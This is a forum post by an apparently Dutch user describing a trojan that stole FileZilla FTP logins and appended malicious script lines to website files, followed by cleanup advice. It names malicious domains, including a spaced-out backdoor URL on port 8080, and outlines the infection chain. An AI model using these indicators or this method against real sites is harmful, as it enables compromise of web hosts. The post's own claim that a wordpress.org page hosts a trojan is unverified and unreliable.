Hi everyone,
I had the same problem, windows up-to-date, antivirus up-to-date ( AVG on the first and Symantec on my second computer ), antispyware up-to-date..... I never install "strange things" ... so I thought that I was protected.
Suddenly all of the sites/accounts in my filezilla where infected by a JS:Illredir-CB [Trj] trojan.
It happens after seeing a website of an big company.
This Trojan came in my computer, without any warning.....so easy.
The script was a javascript function: all kinds of tricks to create al link to a remote site with port 8080.
This one put a JAVA applet in a iframe, and this opened a CMD in the background wich installed some files localy in system32.
What I did:
- DELETE all your FTP login
settings, or set this in all the
accounts on "ask password"
- I changed ALL the settings of the
FTP accounts. (DO IT, because i
forgot one, and this one was 3 days
later touched again )
- Scan your computer entirely. I
noticed at this moment that only
AVAST detected this one ( i did try
al lot of scanners)
- ALL your FTP sites are touched...
and every map ... in my case also
the https files ...so you have to
check all the files ( check it on
date/time )
Check All the .JS files and All the files with names like "home" "default" and "index"....at the bottom of the file is an extra line written. ( they are not all the same !! ....but look-a-like )
Some of my files were totaly corrupt, so i had to take the backup for this ones.
In de FTP log files of the server i see several times an attempt to connect with the old settings..... so they try it more then once.
I took a good look at the scriptings which infected my computer:in my case the function opened the backdoor to
[ http:// highstate . ru: 8080 /google.com/stumbleupon.com/btjunkie.org.php ]
but i saw in some other scripts that highstate.ru is not the only domain.....
Check these links what norton says about this domains:
[ https:// safeweb.norton.com/ report/show?name=anyscent.ru ]
or
[ https:// safeweb.norton.com/ report/show?name=highstate.ru ]
Latest ones i saw:
index.html: JS:Illredir-CB [Trj] ++
exemple.htm [L] HTML:Downloader-F [Trj] ++
Applet1.htm [L] JS:Jaderun-A [Expl] all by the same method: a remote script on the bottom of a webpage / js-file
Nice example: at this moment is a trojan on THIS SITE: [ http:// wordpress.org /support/topic/349452 ]
my AVAST saw this one, and disabled the page.
I hope somebody can do something with my experience !!
( :-) sorry about the language-mistakes, but i am dutch (-: )
kind regards,
Harts from Holland